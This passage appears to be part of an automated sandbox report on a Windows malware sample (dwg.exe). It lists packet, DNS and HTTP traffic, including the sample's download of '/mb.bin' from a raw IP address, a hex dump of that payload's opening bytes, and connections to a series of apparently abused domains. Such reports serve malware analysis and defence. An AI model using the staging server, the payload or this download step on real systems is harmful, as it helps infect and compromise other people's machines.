                                                Feb 25, 2021 15:34:16.666847944 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666868925 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.666872025 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666896105 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666912079 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.666918993 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666938066 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.666941881 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666965008 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666976929 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.666992903 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.667011023 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.667016983 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.667040110 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.667047977 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.667062044 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.667084932 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.667085886 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.667108059 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.667129993 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.667133093 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.667151928 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.667162895 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.667176008 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.667200089 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.667205095 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.667222977 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.667246103 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.667253971 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.667264938 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.667283058 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.667309046 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:37.126265049 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:59.478404045 CET4972180192.168.2.523.227.38.74
                                                Feb 25, 2021 15:34:59.519345045 CET804972123.227.38.74192.168.2.5
                                                Feb 25, 2021 15:34:59.519473076 CET4972180192.168.2.523.227.38.74
                                                Feb 25, 2021 15:34:59.519618988 CET4972180192.168.2.523.227.38.74
                                                Feb 25, 2021 15:34:59.560380936 CET804972123.227.38.74192.168.2.5
                                                Feb 25, 2021 15:34:59.716490030 CET804972123.227.38.74192.168.2.5
                                                Feb 25, 2021 15:34:59.716525078 CET804972123.227.38.74192.168.2.5
                                                Feb 25, 2021 15:34:59.716671944 CET4972180192.168.2.523.227.38.74
                                                Feb 25, 2021 15:34:59.716747046 CET4972180192.168.2.523.227.38.74
                                                Feb 25, 2021 15:34:59.717433929 CET804972123.227.38.74192.168.2.5
                                                Feb 25, 2021 15:34:59.717458010 CET804972123.227.38.74192.168.2.5
                                                Feb 25, 2021 15:34:59.717474937 CET804972123.227.38.74192.168.2.5
                                                Feb 25, 2021 15:34:59.717485905 CET804972123.227.38.74192.168.2.5
                                                Feb 25, 2021 15:34:59.717525005 CET4972180192.168.2.523.227.38.74
                                                Feb 25, 2021 15:34:59.717571020 CET4972180192.168.2.523.227.38.74
                                                Feb 25, 2021 15:34:59.717592001 CET804972123.227.38.74192.168.2.5
                                                Feb 25, 2021 15:34:59.717622995 CET4972180192.168.2.523.227.38.74
                                                Feb 25, 2021 15:34:59.717648029 CET4972180192.168.2.523.227.38.74
                                                Feb 25, 2021 15:34:59.757596970 CET804972123.227.38.74192.168.2.5
                                                Feb 25, 2021 15:34:59.757671118 CET4972180192.168.2.523.227.38.74
                                                Feb 25, 2021 15:35:04.804613113 CET4972780192.168.2.534.102.136.180
                                                Feb 25, 2021 15:35:04.845561028 CET804972734.102.136.180192.168.2.5
                                                Feb 25, 2021 15:35:04.845707893 CET4972780192.168.2.534.102.136.180
                                                Feb 25, 2021 15:35:04.845968008 CET4972780192.168.2.534.102.136.180
                                                Feb 25, 2021 15:35:04.886838913 CET804972734.102.136.180192.168.2.5
                                                Feb 25, 2021 15:35:04.985801935 CET804972734.102.136.180192.168.2.5
                                                Feb 25, 2021 15:35:04.985874891 CET804972734.102.136.180192.168.2.5
                                                Feb 25, 2021 15:35:04.985971928 CET4972780192.168.2.534.102.136.180
                                                Feb 25, 2021 15:35:04.986074924 CET4972780192.168.2.534.102.136.180
                                                Feb 25, 2021 15:35:05.026997089 CET804972734.102.136.180192.168.2.5
                                                Feb 25, 2021 15:35:15.521455050 CET4972980192.168.2.5104.21.56.93
                                                Feb 25, 2021 15:35:15.562258005 CET8049729104.21.56.93192.168.2.5
                                                Feb 25, 2021 15:35:15.562453985 CET4972980192.168.2.5104.21.56.93
                                                Feb 25, 2021 15:35:15.562661886 CET4972980192.168.2.5104.21.56.93
                                                Feb 25, 2021 15:35:15.603391886 CET8049729104.21.56.93192.168.2.5
                                                Feb 25, 2021 15:35:15.637638092 CET8049729104.21.56.93192.168.2.5
                                                Feb 25, 2021 15:35:15.637666941 CET8049729104.21.56.93192.168.2.5
                                                Feb 25, 2021 15:35:15.637679100 CET8049729104.21.56.93192.168.2.5
                                                Feb 25, 2021 15:35:15.638005018 CET4972980192.168.2.5104.21.56.93
                                                Feb 25, 2021 15:35:15.638025999 CET4972980192.168.2.5104.21.56.93
                                                Feb 25, 2021 15:35:15.638887882 CET8049729104.21.56.93192.168.2.5
                                                Feb 25, 2021 15:35:15.638943911 CET4972980192.168.2.5104.21.56.93
                                                Feb 25, 2021 15:35:20.722960949 CET4973080192.168.2.5192.0.78.25
                                                Feb 25, 2021 15:35:20.763736963 CET8049730192.0.78.25192.168.2.5
                                                Feb 25, 2021 15:35:20.763871908 CET4973080192.168.2.5192.0.78.25
                                                Feb 25, 2021 15:35:20.764060974 CET4973080192.168.2.5192.0.78.25
                                                Feb 25, 2021 15:35:20.804807901 CET8049730192.0.78.25192.168.2.5
                                                Feb 25, 2021 15:35:20.804835081 CET8049730192.0.78.25192.168.2.5
                                                Feb 25, 2021 15:35:20.804842949 CET8049730192.0.78.25192.168.2.5
                                                Feb 25, 2021 15:35:20.805134058 CET4973080192.168.2.5192.0.78.25
                                                Feb 25, 2021 15:35:20.805248976 CET4973080192.168.2.5192.0.78.25
                                                Feb 25, 2021 15:35:20.845963955 CET8049730192.0.78.25192.168.2.5
                                                Feb 25, 2021 15:35:25.918828011 CET4973180192.168.2.594.136.40.51
                                                Feb 25, 2021 15:35:25.974733114 CET804973194.136.40.51192.168.2.5
                                                Feb 25, 2021 15:35:25.974895000 CET4973180192.168.2.594.136.40.51
                                                Feb 25, 2021 15:35:25.975158930 CET4973180192.168.2.594.136.40.51
                                                Feb 25, 2021 15:35:26.032011032 CET804973194.136.40.51192.168.2.5
                                                Feb 25, 2021 15:35:26.032040119 CET804973194.136.40.51192.168.2.5
                                                Feb 25, 2021 15:35:26.032208920 CET4973180192.168.2.594.136.40.51
                                                Feb 25, 2021 15:35:26.032283068 CET4973180192.168.2.594.136.40.51
                                                Feb 25, 2021 15:35:26.088373899 CET804973194.136.40.51192.168.2.5
                                                Feb 25, 2021 15:35:31.291584969 CET4973380192.168.2.5146.148.189.216
                                                Feb 25, 2021 15:35:31.476854086 CET8049733146.148.189.216192.168.2.5
                                                Feb 25, 2021 15:35:31.476939917 CET4973380192.168.2.5146.148.189.216
                                                Feb 25, 2021 15:35:31.477104902 CET4973380192.168.2.5146.148.189.216
                                                Feb 25, 2021 15:35:31.959116936 CET4973380192.168.2.5146.148.189.216
                                                Feb 25, 2021 15:35:31.990813971 CET4973380192.168.2.5146.148.189.216
                                                Feb 25, 2021 15:35:32.568774939 CET4973380192.168.2.5146.148.189.216
                                                Feb 25, 2021 15:35:33.678253889 CET4973380192.168.2.5146.148.189.216
                                                Feb 25, 2021 15:35:35.896950960 CET4973380192.168.2.5146.148.189.216
                                                Feb 25, 2021 15:35:38.115953922 CET4973380192.168.2.5146.148.189.216
                                                Feb 25, 2021 15:35:40.335508108 CET4973380192.168.2.5146.148.189.216
                                                Feb 25, 2021 15:35:44.195084095 CET4973480192.168.2.594.136.40.51
                                                Feb 25, 2021 15:35:44.251079082 CET804973494.136.40.51192.168.2.5
                                                Feb 25, 2021 15:35:44.252334118 CET4973480192.168.2.594.136.40.51
                                                Feb 25, 2021 15:35:44.252448082 CET4973480192.168.2.594.136.40.51
                                                Feb 25, 2021 15:35:44.309845924 CET804973494.136.40.51192.168.2.5
                                                Feb 25, 2021 15:35:44.309886932 CET804973494.136.40.51192.168.2.5
                                                Feb 25, 2021 15:35:44.310046911 CET4973480192.168.2.594.136.40.51
                                                Feb 25, 2021 15:35:44.310072899 CET4973480192.168.2.594.136.40.51
                                                Feb 25, 2021 15:35:44.366085052 CET804973494.136.40.51192.168.2.5
                                                Feb 25, 2021 15:35:44.772839069 CET4973380192.168.2.5146.148.189.216
                                                Feb 25, 2021 15:35:49.463138103 CET4973580192.168.2.547.110.53.154
                                                Feb 25, 2021 15:35:52.585910082 CET4973580192.168.2.547.110.53.154
                                                Feb 25, 2021 15:35:53.696007013 CET4973380192.168.2.5146.148.189.216
                                                Feb 25, 2021 15:35:58.601968050 CET4973580192.168.2.547.110.53.154
                                                Feb 25, 2021 15:36:11.431186914 CET4973380192.168.2.5146.148.189.216
                                                Feb 25, 2021 15:36:12.044609070 CET4974780192.168.2.547.110.53.154

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Feb 25, 2021 15:33:46.760808945 CET5430253192.168.2.58.8.8.8
                                                Feb 25, 2021 15:33:46.809546947 CET53543028.8.8.8192.168.2.5
                                                Feb 25, 2021 15:33:46.944928885 CET5378453192.168.2.58.8.8.8
                                                Feb 25, 2021 15:33:46.993603945 CET53537848.8.8.8192.168.2.5
                                                Feb 25, 2021 15:33:47.278341055 CET6530753192.168.2.58.8.8.8
                                                Feb 25, 2021 15:33:47.329859018 CET53653078.8.8.8192.168.2.5
                                                Feb 25, 2021 15:33:47.430898905 CET6434453192.168.2.58.8.8.8
                                                Feb 25, 2021 15:33:47.480560064 CET53643448.8.8.8192.168.2.5
                                                Feb 25, 2021 15:33:48.598409891 CET6206053192.168.2.58.8.8.8
                                                Feb 25, 2021 15:33:48.647420883 CET53620608.8.8.8192.168.2.5
                                                Feb 25, 2021 15:33:49.453242064 CET6180553192.168.2.58.8.8.8
                                                Feb 25, 2021 15:33:49.501979113 CET53618058.8.8.8192.168.2.5
                                                Feb 25, 2021 15:33:50.042534113 CET5479553192.168.2.58.8.8.8
                                                Feb 25, 2021 15:33:50.111465931 CET53547958.8.8.8192.168.2.5
                                                Feb 25, 2021 15:33:50.840801954 CET4955753192.168.2.58.8.8.8
                                                Feb 25, 2021 15:33:50.889533997 CET53495578.8.8.8192.168.2.5
                                                Feb 25, 2021 15:33:51.791261911 CET6173353192.168.2.58.8.8.8
                                                Feb 25, 2021 15:33:51.839999914 CET53617338.8.8.8192.168.2.5
                                                Feb 25, 2021 15:33:53.128864050 CET6544753192.168.2.58.8.8.8
                                                Feb 25, 2021 15:33:53.179744959 CET53654478.8.8.8192.168.2.5
                                                Feb 25, 2021 15:33:54.904480934 CET5244153192.168.2.58.8.8.8
                                                Feb 25, 2021 15:33:54.956171989 CET53524418.8.8.8192.168.2.5
                                                Feb 25, 2021 15:33:59.180936098 CET6217653192.168.2.58.8.8.8
                                                Feb 25, 2021 15:33:59.238554955 CET53621768.8.8.8192.168.2.5
                                                Feb 25, 2021 15:34:00.270656109 CET5959653192.168.2.58.8.8.8
                                                Feb 25, 2021 15:34:00.319485903 CET53595968.8.8.8192.168.2.5
                                                Feb 25, 2021 15:34:02.033029079 CET6529653192.168.2.58.8.8.8
                                                Feb 25, 2021 15:34:02.081828117 CET53652968.8.8.8192.168.2.5
                                                Feb 25, 2021 15:34:03.337635994 CET6318353192.168.2.58.8.8.8
                                                Feb 25, 2021 15:34:03.386605978 CET53631838.8.8.8192.168.2.5
                                                Feb 25, 2021 15:34:05.278891087 CET6015153192.168.2.58.8.8.8
                                                Feb 25, 2021 15:34:05.327903986 CET53601518.8.8.8192.168.2.5
                                                Feb 25, 2021 15:34:15.828790903 CET5696953192.168.2.58.8.8.8
                                                Feb 25, 2021 15:34:15.888827085 CET53569698.8.8.8192.168.2.5
                                                Feb 25, 2021 15:34:26.380974054 CET5516153192.168.2.58.8.8.8
                                                Feb 25, 2021 15:34:26.430370092 CET53551618.8.8.8192.168.2.5
                                                Feb 25, 2021 15:34:41.504708052 CET5475753192.168.2.58.8.8.8
                                                Feb 25, 2021 15:34:41.564961910 CET53547578.8.8.8192.168.2.5
                                                Feb 25, 2021 15:34:41.824915886 CET4999253192.168.2.58.8.8.8
                                                Feb 25, 2021 15:34:41.873536110 CET53499928.8.8.8192.168.2.5
                                                Feb 25, 2021 15:34:59.387612104 CET6007553192.168.2.58.8.8.8
                                                Feb 25, 2021 15:34:59.467755079 CET53600758.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:00.532416105 CET5501653192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:00.590795040 CET53550168.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:04.727324963 CET6434553192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:04.803482056 CET53643458.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:10.006350040 CET5712853192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:10.165909052 CET53571288.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:15.455497026 CET5479153192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:15.520267010 CET53547918.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:20.651760101 CET5046353192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:20.721322060 CET53504638.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:25.823204994 CET5039453192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:25.916791916 CET53503948.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:30.873569012 CET5853053192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:30.922476053 CET53585308.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:31.067783117 CET5381353192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:31.290615082 CET53538138.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:37.013619900 CET6373253192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:38.006710052 CET6373253192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:39.022430897 CET6373253192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:39.119537115 CET53637328.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:40.121794939 CET53637328.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:41.133748055 CET53637328.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:44.136579037 CET5734453192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:44.193861961 CET53573448.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:49.397527933 CET5445053192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:49.461996078 CET53544508.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:51.366041899 CET5926153192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:51.446662903 CET53592618.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:52.313885927 CET5715153192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:52.377159119 CET53571518.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:52.943109989 CET5941353192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:53.003117085 CET53594138.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:53.415678978 CET6051653192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:53.488059044 CET53605168.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:53.489516973 CET5164953192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:53.592928886 CET53516498.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:54.130358934 CET6508653192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:54.190591097 CET53650868.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:54.873523951 CET5643253192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:54.954210043 CET53564328.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:55.668181896 CET5292953192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:55.725471020 CET53529298.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:56.585637093 CET6431753192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:56.645855904 CET53643178.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:57.545361996 CET6100453192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:57.597060919 CET53610048.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:58.037137985 CET5689553192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:58.094475031 CET53568958.8.8.8192.168.2.5
                                                Feb 25, 2021 15:36:11.851654053 CET6237253192.168.2.58.8.8.8
                                                Feb 25, 2021 15:36:11.925832987 CET53623728.8.8.8192.168.2.5

                                                ICMP Packets

                                                TimestampSource IPDest IPChecksumCodeType
                                                Feb 25, 2021 15:35:40.123188019 CET192.168.2.58.8.8.8cfff(Port unreachable)Destination Unreachable
                                                Feb 25, 2021 15:35:41.133950949 CET192.168.2.58.8.8.8cfff(Port unreachable)Destination Unreachable

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                Feb 25, 2021 15:34:59.387612104 CET192.168.2.58.8.8.80x2dd7Standard query (0)www.buytgp.comA (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:04.727324963 CET192.168.2.58.8.8.80x3337Standard query (0)www.delmarranch.comA (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:10.006350040 CET192.168.2.58.8.8.80x4175Standard query (0)www.youridealworld.comA (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:15.455497026 CET192.168.2.58.8.8.80x8107Standard query (0)www.apkiinsurance.comA (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:20.651760101 CET192.168.2.58.8.8.80x1b27Standard query (0)www.bestcroissantinlondon.comA (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:25.823204994 CET192.168.2.58.8.8.80x33feStandard query (0)www.thakehamwesthorsley.comA (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:31.067783117 CET192.168.2.58.8.8.80xcd6cStandard query (0)www.guillemaudexcellenceauto.comA (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:37.013619900 CET192.168.2.58.8.8.80x64eStandard query (0)www.scriptureonhealing.comA (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:38.006710052 CET192.168.2.58.8.8.80x64eStandard query (0)www.scriptureonhealing.comA (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:39.022430897 CET192.168.2.58.8.8.80x64eStandard query (0)www.scriptureonhealing.comA (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:44.136579037 CET192.168.2.58.8.8.80xeb17Standard query (0)www.karatetheokinawaway.comA (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:49.397527933 CET192.168.2.58.8.8.80x5be2Standard query (0)www.qionglaizhan.comA (IP address)IN (0x0001)
                                                Feb 25, 2021 15:36:11.851654053 CET192.168.2.58.8.8.80x1886Standard query (0)www.qionglaizhan.comA (IP address)IN (0x0001)

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                Feb 25, 2021 15:34:59.467755079 CET8.8.8.8192.168.2.50x2dd7No error (0)www.buytgp.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                Feb 25, 2021 15:34:59.467755079 CET8.8.8.8192.168.2.50x2dd7No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:04.803482056 CET8.8.8.8192.168.2.50x3337No error (0)www.delmarranch.comdelmarranch.comCNAME (Canonical name)IN (0x0001)
                                                Feb 25, 2021 15:35:04.803482056 CET8.8.8.8192.168.2.50x3337No error (0)delmarranch.com34.102.136.180A (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:10.165909052 CET8.8.8.8192.168.2.50x4175No error (0)www.youridealworld.comghs.google.comCNAME (Canonical name)IN (0x0001)
                                                Feb 25, 2021 15:35:15.520267010 CET8.8.8.8192.168.2.50x8107No error (0)www.apkiinsurance.com104.21.56.93A (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:15.520267010 CET8.8.8.8192.168.2.50x8107No error (0)www.apkiinsurance.com172.67.183.186A (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:20.721322060 CET8.8.8.8192.168.2.50x1b27No error (0)www.bestcroissantinlondon.combestcroissantinlondon.comCNAME (Canonical name)IN (0x0001)
                                                Feb 25, 2021 15:35:20.721322060 CET8.8.8.8192.168.2.50x1b27No error (0)bestcroissantinlondon.com192.0.78.25A (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:20.721322060 CET8.8.8.8192.168.2.50x1b27No error (0)bestcroissantinlondon.com192.0.78.24A (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:25.916791916 CET8.8.8.8192.168.2.50x33feNo error (0)www.thakehamwesthorsley.com94.136.40.51A (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:31.290615082 CET8.8.8.8192.168.2.50xcd6cNo error (0)www.guillemaudexcellenceauto.com146.148.189.216A (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:39.119537115 CET8.8.8.8192.168.2.50x64eServer failure (2)www.scriptureonhealing.comnonenoneA (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:40.121794939 CET8.8.8.8192.168.2.50x64eServer failure (2)www.scriptureonhealing.comnonenoneA (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:41.133748055 CET8.8.8.8192.168.2.50x64eServer failure (2)www.scriptureonhealing.comnonenoneA (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:44.193861961 CET8.8.8.8192.168.2.50xeb17No error (0)www.karatetheokinawaway.com94.136.40.51A (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:49.461996078 CET8.8.8.8192.168.2.50x5be2No error (0)www.qionglaizhan.com47.110.53.154A (IP address)IN (0x0001)
                                                Feb 25, 2021 15:36:11.925832987 CET8.8.8.8192.168.2.50x1886No error (0)www.qionglaizhan.com47.110.53.154A (IP address)IN (0x0001)

                                                HTTP Request Dependency Graph

                                                • 45.153.203.33
                                                • www.buytgp.com
                                                • www.delmarranch.com
                                                • www.apkiinsurance.com
                                                • www.bestcroissantinlondon.com
                                                • www.thakehamwesthorsley.com
                                                • www.guillemaudexcellenceauto.com
                                                • www.karatetheokinawaway.com

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.54971645.153.203.3380C:\Users\user\Desktop\dwg.exe
                                                TimestampkBytes transferredDirectionData
                                                Feb 25, 2021 15:34:16.437721014 CET1150OUTGET /mb.bin HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                Host: 45.153.203.33
                                                Cache-Control: no-cache
                                                Feb 25, 2021 15:34:16.496598005 CET1151INHTTP/1.1 200 OK
                                                Content-Type: application/octet-stream
                                                Last-Modified: Thu, 25 Feb 2021 10:54:48 GMT
                                                Accept-Ranges: bytes
                                                ETag: "211feda264bd71:0"
                                                Server: Microsoft-IIS/10.0
                                                Date: Thu, 25 Feb 2021 14:34:16 GMT
                                                Content-Length: 164928
                                                Data Raw: a8 24 4b 82 f9 88 f9 c6 7d 04 10 aa 72 07 c5 63 43 e5 18 2e 43 2d 60 f8 bf 3c b3 20 cf 0a ca 10 37 8a d7 cd 8f ca 5e 1b 5c 5c f4 e4 0a 6f bf 86 a0 07 3d 78 77 98 da 38 7e c0 76 7b 5c f4 9c ae cd 00 90 37 c0 a5 0d b0 c3 4f 21 11 da 2f 61 53 72 d8 5a 68 e7 ee 3c 65 9d 33 bf d9 40 d6 5c 0d 17 e1 36 4a 69 c8 4f 27 75 46 93 a5 8f ea 72 c8 de 7b b4 f8 d3 e4 85 2f cd 16 cb cd 53 70 4d db 67 4a 4f 82 d5 5a ab e3 a8 4d 5d 65 5a 45 3d 77 65 74 d5 dd a2 e7 bd 37 60 d6 03 d8 aa c9 c0 02 bd 14 f5 87 4a e1 0f f4 6b 38 73 85 78 ef 7e 99 64 b1 69 a9 c2 8a 8d 23 9e ea 9c bd ad cc 6b 38 30 a4 07 9c 2c 4e 67 94 39 0d 79 ed 24 3d 11 d4 b5 84 00 e5 05 22 da c7 39 50 08 20 6d 05 42 68 f5 35 04 fe eb 44 f8 17 35 81 2a 60 1d ad d4 3c 3b ea c8 0e 19 14 9b 48 d0 b4 a9 48 87 24 03 0d 2d 1c dd 8a 5f f9 17 15 f8 8b b1 6b 51 da c2 af bc 9d 7b 79 b6 c8 bf fc e1 5c d6 75 1d 15 8e 2c ff 01 e4 ab fe 75 7e 9c 3e a8 c3 20 64 b7 8d 05 27 f4 5a d0 fb 87 d4 d5 f0 f7 b9 57 d0 a8 10 e3 0e bd d4 6d c3 53 fd 46 04 1b 3c 22 f7 4b d1 eb df 40 73 97 0f b4 f9 6d 82 7e 36 8a e8 3a 22 79 3c 51 5c de bf fe 20 b1 fe 1d 90 27 56 9b a9 f8 65 ea fa 9f 7b 0e 4d e2 63 06 43 dc 8b fe 04 ce 32 9a 27 6d aa 3b 25 bc 71 a2 46 51 80 ce 03 07 9d bd 89 3c 4b 79 93 a5 7e 3f a0 ee e8 38 75 1d e2 00 e3 56 5d 4d 54 dd 38 f6 bf 98 b8 1f c8 61 38 21 84 a4 58 31 39 5a 48 a0 83 17 d0 8e ce dc c0 80 d1 8b ef f4 3a 72 74 59 65 f1 a0 52 7b d9 5e b7 58 5b 2f 62 11 b0 b6 c6 ad ea d7 19 ec 79 43 d5 b4 b4 7d 11 60 d9 c7 a0 e3 c7 11 fc 14 b0 f6 84 43 c4 2c cd 00 7f 95 e9 11 ed 15 0d 5a aa 9d 0e 67 de 8b b4 31 a1 28 91 5c e8 74 e2 90 ef 99 5b f0 41 85 be d0 8d c7 d0 16 3a 43 c0 f6 59 66 bb d0 46 f8 79 9f f0 bc 97 1c bc b8 b4 61 32 6e 6a b5 6b cb d4 42 36 a4 f8 fc e4 34 88 ff f1 ad 97 3a df ef 14 29 22 a7 e3 d8 55 11 e6 26 f4 c5 5f d5 db 7a c2 eb 67 00 0a ae d9 5d 47 e6 d7 3b 43 5b dc 1e 7b 84 73 f4 49 1f 52 71 b9 c2 93 12 39 7f ce d5 7c 0c 69 00 14 01 c9 7c 30 96 24 a0 d8 e1 34 36 9a 38 94 e2 72 86 dd 74 16 e1 20 0e e9 f1 2d 93 46 9e ba 1f 6b 8b 9d 7f ea 84 c3 6d db 40 35 d8 18 c7 a0 d6 a9 f2 1f 5e 4a c0 89 c6 84 d2 88 a4 49 bb fa 1e 8e b4 ca 62 60 1d bb ee a3 3c 7b b8 ef 7a b6 80 99 d9 c4 48 b0 b2 a4 ff d0 9d ce 4b d4 84 1c 28 da 80 ba f2 11 0c 46 b8 d2 d2 43 cc 8a 2a 30 91 b9 c1 bf df c0 d1 2e 47 03 43 70 45 e2 72 e5 ef 6f 64 53 aa 35 86 64 e0 d5 e9 3b a5 0a bd f4 53 8b af 0b a6 dd 55 0e bb 2c 5d 00 ae c5 09 06 43 07 4f d0 03 63 69 05 d9 11 f6 76 2a d7 e3 a0 72 a7 c4 6f 23 7e a0 52 83 da 03 b3 2a dd d7 c7 2a f0 a5 b5 b6 79 eb fd d2 80 5a d5 65 28 a5 0d b0 c3 17 a2 f9 d3 a4 a9 d0 b2 e4 d1 68 e4 2f bf a5 b5 30 b7 26 a1 46 5c 0d 17 e1 36 4a 69 c8 4f 27 75 46 93 a5 8f ea 72 c8 de 7b b4 f8 d3 e4 85 2f cd 16 cb cd eb 70 4d db 69 55 f5 8c d5 ee a2 2e 89 f5 5c 29 97 64 69 1f 0c 07 f5 ad d0 88 da 45 01 bb 23 bb cb a7 ae 6d c9 34 97 e2 6a 93 7a 9a 4b 51 1d a5 3c a0 2d b9 09 de 0d cc ec 87 80 29 ba ea 9c bd ad cc 6b 38 f5 01 8d 8a ad 8a 83 d1 b8 c9 9d a8 a5 f9 f5 91 5b 36 4f a0 c8 e6 3e 82 d7 e2 72 65 ef c1 a6 2d 1b 87 7d bb 6b 80 1c 52 67 e8 49 08 9c 69 30 79 3b ea c8 0e 19 14 9b 48 80 f1 a9 48 cb 25 02 0d 8f df 2e b4 5f f9 17 15 f8 8b b1 6b b1 da c0 ae b7 9c 71 79 b6 ba bd fc e1 5c d6 75 1d 15 8e 2c 4f d1 e5 ab fe 65 7e 9c 3e 38 c1 20 64 b7 cd 05 27 e4 5a d0 fb 85 d4 d5 f5 f7 b8 57 d0 a8 10 e3 0b bd d5 